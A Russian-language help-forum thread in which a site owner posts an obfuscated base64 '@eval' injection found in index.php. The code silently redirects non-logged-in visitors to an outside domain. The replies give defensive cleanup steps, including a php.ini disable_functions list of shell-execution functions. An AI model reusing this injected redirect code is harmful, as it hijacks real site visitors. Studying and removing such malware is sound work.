# Как грамотно удалить вирус?

Tags: php, laravel

Нашел в своем index.php следующий код:

```
/*aeR4Choc_start*/@eval(base64_decode('aWYoIWRlZmluZWQoImNoYWVKb3U3IikpewogICAgZGVmaW5lKCJjaGFlSm91NyIsIDEpOwogICAgZnVuY3Rpb24gaXNNb2JpbGUoJHVhZ2VudFN0cil7CiAgICAgICAgaWYoc3RycG9zKCR1YWdlbnRTdHIsICdhbmRyb2lkJykgIT09IGZhbHNlIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnYmxhY2tiZXJyeScpICE9PSBmYWxzZQogICAgICAgICAgICB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2lwaG9uZScpICE9PSBmYWxzZSB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2lwYWQnKSAhPT0gZmFsc2UKICAgICAgICAgICAgfHwgc3RycG9zKCR1YWdlbnRTdHIsICdpcG9kJykgIT09IGZhbHNlIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnb3BlcmEgbWluaScpICE9PSBmYWxzZQogICAgICAgICAgICB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2llTW9iaWxlJykgIT09IGZhbHNlKXsKICAgICAgICAgICAgcmV0dXJuIHRydWU7CiAgICAgICAgfQogICAgICAgIHJldHVybiBmYWxzZTsKICAgIH0KCiAgICBmdW5jdGlvbiBpc0Rlc2t0b3AoJHVhZ2VudFN0cil7CiAgICAgICAgaWYoc3RycG9zKCR1YWdlbnRTdHIsICdlZGdlJykgIT09IGZhbHNlIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnbXNpZScpICE9PSBmYWxzZQogICAgICAgICAgICB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ29wcicpICE9PSBmYWxzZSB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2Nocm9taXVtJykgIT09IGZhbHNlCiAgICAgICAgICAgIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnZmlyZWZveCcpICE9PSBmYWxzZSB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2Nocm9tZScpICE9PSBmYWxzZSl7CiAgICAgICAgICAgIHJldHVybiB0cnVlOwogICAgICAgIH0KICAgICAgICByZXR1cm4gZmFsc2U7CiAgICB9CgogICAgJHJlZGlyVG8gPSAiaHR0cHM6Ly93d3cucm94b2Vub3MueHl6LyI7CiAgICAkY2hlY2tDb29rUmVkaXJTdHIgPSAiYWVOZWU4cGkiOwogICAgJHJlZGlyZWN0QWxsb3cgPSB0cnVlOwogICAgZm9yZWFjaCAoJF9DT09LSUUgYXMgJGNvb2tLZXk9PiRjb29rVmFsKXsKICAgICAgICBpZiAoc3RycG9zKCRjb29rS2V5LCAnd29yZHByZXNzX2xvZ2dlZF9pbicpICE9PSBmYWxzZSB8fCAkY29va0tleSA9PSAkY2hlY2tDb29rUmVkaXJTdHIpIHsKICAgICAgICAgICAgJHJlZGlyZWN0QWxsb3cgPSBmYWxzZTsKICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgfQogICAgfQoKICAgICR1YWdlbnQgPSBzdHJ0b2xvd2VyKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSk7CgogICAgaWYgKCRyZWRpcmVjdEFsbG93KXsKICAgICAgICBpZihpc01vYmlsZSgkdWFnZW50KSB8fCBpc0Rlc2t0b3AoJHVhZ2VudCkpIHsKICAgICAgICAgICAgc2V0Y29va2llKCRjaGVja0Nvb2tSZWRpclN0ciwgIjEiLCB0aW1lKCkgKyA2MDQ4MDApOwogICAgICAgICAgICBoZWFkZXIoIkxvY2F0aW9uOiAkcmVkaXJUbyIpOwogICAgICAgICAgICBkaWU7CiAgICAgICAgfQogICAgfQp9'));/*aeR4Choc_end*/
```

Я так понимаю это какой-то вирус. Подскажите, как правильно избавиться от этого и защитить себя на бедующее?

Comment: Сперва нужно всё тщательно исследовать и выяснить, как сюда вирус вообще попал

Comment: @andreymal в этом то и проблема. Не знаю даже с чего начать.

Comment: @РодионПоляков начните с инспекции своего кода на наличие всех `eval` функций

Comment: Вроде похожий вопрос, может поможет как-то https://stackoverflow.com/questions/65924947/question-about-sercurity-flaw-for-malicious-code-aer4choc-injection

Answer (score 5, accepted):

Проблема в том, что в проекте может быть множество точек входа в ваше приложение и бэкдоров, выявление которых может занять совершенно неопределенное время. И если вы удалите вредоносный код, то он потом появится снова.

Но вот что вы можете сделать чтобы они стали неактивными:

- Обновить версию PHP и фреймворка до максимально возможной (это закроет известные уязвимости)
- из этого проекта https://github.com/sektioneins/pcc взять файл phpconfigcheck.php, поместить на сервер и открыть в браузере, выполнить рекомендации
- в php.ini добавить:

```
disable_functions = "apache_setenv, chown, chgrp, closelog, define_syslog_variables, dl, exec, ftp_exec, openlog, passthru, pcntl_exec, popen, posix_getegid, posix_geteuid, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, proc_open, proc_terminate, shell_exec, syslog, system"
```

- зайти на сервер по SSH и с помощью grep провести поиск текста по содержимому файлов, например:

```
egrep -rns --color @eval
```

этот пример найдет все файлы с вхождением `@eval` и их можно удалить

- Если в вашем проекте/CMS есть встроенный инструмент проверки безопасности, то нужно его запустить и исправить все найденные угрозы и рекомендации, например в bitrix он тут:

```
Администрирование - Настройки - Проактивная защита - сканер безопасности
```

- и наконец поменяйте все пароли FTP/SSH ключи/Хостинг админки/БД/